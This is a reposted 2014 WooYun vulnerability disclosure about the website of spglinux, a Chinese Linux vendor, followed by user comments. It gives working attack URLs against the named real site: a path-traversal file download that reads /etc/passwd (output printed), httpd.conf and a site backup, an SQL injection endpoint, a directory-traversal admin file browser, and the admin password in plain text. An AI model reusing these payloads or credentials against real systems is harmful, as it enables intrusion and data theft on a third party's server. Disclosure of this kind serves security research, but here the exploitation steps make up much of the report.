国产操作系统厂商spglinux官网漏洞合集

admin
admin
admin
146004
文章
119
评论
2015年7月23日13:27:59评论302 views字数 237阅读0分47秒阅读模式
摘要

2014-10-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-13: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2014-81207

漏洞标题: 国产操作系统厂商spglinux官网漏洞合集

相关厂商: spgnux.com

漏洞作者: xorop

提交时间: 2014-10-29 15:56

公开时间: 2014-12-13 15:58

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 弱口令 php+数字类型注射 任意文件下载

1人收藏

漏洞详情

披露状态:

2014-10-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看到篇新闻,http://www.cnbeta.com/articles/341029.htm,不信邪。
大体测试了下,发现一堆漏洞和敏感信息泄露。

详细说明:

包括:任意文件下载,SQL注入,弱口令等等。

这样一家公司搞的操作系统实在不怎么看好啊。找到操作系统下载地址下下来装上试试吧,貌似所有序列号都在呢。

漏洞证明:

问题一:任意文件下载漏洞

发现一个操作系统下载的链接:

国产操作系统厂商spglinux官网漏洞合集

http://www.spgnux.com/Public/Uploads/download/1.php?dd=iso/201004240914478.iso

尝试构造跳转链接:

http://www.spgnux.com/Public/Uploads/download/1.php?dd=/etc/passwd

结果发现很温馨的提供了各种绝对路径和想要的文件内容

code 区域 
<br />
 <b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/html/spg/Public/Uploads/download/1.php:1) in <b>/var/www/html/spg/Public/Uploads/download/1.php</b> on line <b>13</b><br />
 <br />
 <b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/html/spg/Public/Uploads/download/1.php:1) in <b>/var/www/html/spg/Public/Uploads/download/1.php</b> on line <b>14</b><br />
 <br />
 <b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/html/spg/Public/Uploads/download/1.php:1) in <b>/var/www/html/spg/Public/Uploads/download/1.php</b> on line <b>15</b><br />
 <br />
 <b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/html/spg/Public/Uploads/download/1.php:1) in <b>/var/www/html/spg/Public/Uploads/download/1.php</b> on line <b>16</b><br />
 root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 adm:x:3:4:adm:/var/adm:/sbin/nologin
 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
 sync:x:5:0:sync:/sbin:/bin/sync
 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
 halt:x:7:0:halt:/sbin:/sbin/halt
 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
 news:x:9:13:news:/etc/news:
 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
 operator:x:11:0:operator:/root:/sbin/nologin
 games:x:12:100:games:/usr/games:/sbin/nologin
 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
 nobody:x:99:99:Nobody:/:/sbin/nologin
 nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
 mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
 pcap:x:77:77::/var/arpwatch:/sbin/nologin
 dbus:x:81:81:System message bus:/:/sbin/nologin
 avahi:x:70:70:Avahi daemon:/:/sbin/nologin
 rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
 mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
 smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
 hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
 ntp:x:38:38::/etc/ntp:/sbin/nologin
 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
 oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
 rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
 nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
 xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
 qemu:x:100:159:qemu user:/:/sbin/nologin
 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
 avahi-autoipd:x:101:160:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
 gdm:x:42:42::/var/gdm:/sbin/nologin
 sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
 apache:x:48:48:Apache:/var/www:/sbin/nologin

其他文件通过尝试后发现都能正常读取。

http://www.spgnux.com/Public/Uploads/download/1.php?dd=/etc/httpd/conf/httpd.conf

获取到了所有的虚拟主机配置和路径。

国产操作系统厂商spglinux官网漏洞合集

然后发现了站点的tar.gz备份文件,通过这个地址继续下载

www.spgnux.com/Public/Uploads/download/1.php?dd=/var/www/html/edu.tar.gz

去掉头部后解压该文件,发现是DXCCMS的源码。懒得看了,继续寻找有用的信息。

问题二:注入漏洞及弱口令

根据上面的信息找到了一个注入地址:

http://hcc.spgnux.com/home/index/index/tep/9?id=1

国产操作系统厂商spglinux官网漏洞合集

国产操作系统厂商spglinux官网漏洞合集

国产操作系统厂商spglinux官网漏洞合集

发现了什么,弱口令有木有,而且所有数据库都能看到

问题三:在线文件浏览器

上面得到了cms的密码,登录进去看看吧

http://www.spgnux.com/admin

用户名密码为admin/spglinux

登陆后简单看了下,发现个地址

http://www.spgnux.com/admin/main/catalogadd/dd/d2/mo/lanm?dxcGCd1=/../../../../..

好东西啊,整个服务器文件随便看了

到此结束了,不做坏事

修复方案:

过滤、用好Thinkphp的安全功能,服务器权限需要调整

更重要的是你得好好做做操作系统啊,现在用的是centos

版权声明:转载请注明来源 xorop@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-29 23:17 | 宝宝 ( 普通白帽子 | Rank:127 漏洞数:34 | 我是好宝宝)

    2

    洞主是不是看了那个云南政府采购操作系统的新闻?其实这家公司的linux貌似很多年没更新了,估计也是个骗钱的公司

  2. 2014-11-02 15:46 | xorop ( 路人 | Rank:9 漏洞数:3 | xxoo!!)

    0

    不用估计了,服务器上的iso文件、pdf文件等各种稍微专业点得文件都是20多k得假文件,服务器没有任何安全配置,社工调查了下这个集团此业务的相关人员,绝对是个大坑。。。

  3. 2014-11-02 15:47 | xorop ( 路人 | Rank:9 漏洞数:3 | xxoo!!)

    0

    @宝宝 不用估计了,服务器上的iso文件、pdf文件等各种稍微专业点得文件都是20多k得假文件,服务器没有任何安全配置,社工调查了下这个集团此业务的相关人员,绝对是个大坑。。

  4. 2014-11-02 19:28 | 宝宝 ( 普通白帽子 | Rank:127 漏洞数:34 | 我是好宝宝)

    0

    所以说我们国家要自主做系统就是个笑话,什么麒麟,红旗,都是为了骗国家的钱,骗纳税人的钱

  5. 2014-12-13 16:03 | zeracker 国产操作系统厂商spglinux官网漏洞合集 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

    1

    @宝宝 @xorop 元心那个操作系统不知道你们看过木有

  6. 2014-12-13 18:35 | keeley ( 路人 | Rank:20 漏洞数:7 | 珍惜生命,远离黑阔)

    1

    Hacked by xorop Blog http://xorop.me Ignore you? 洞主,我只想说: you are so diao !

  7. 2014-12-14 03:09 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

    1

    Hacked by xorop CCTV看这里 看这里

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin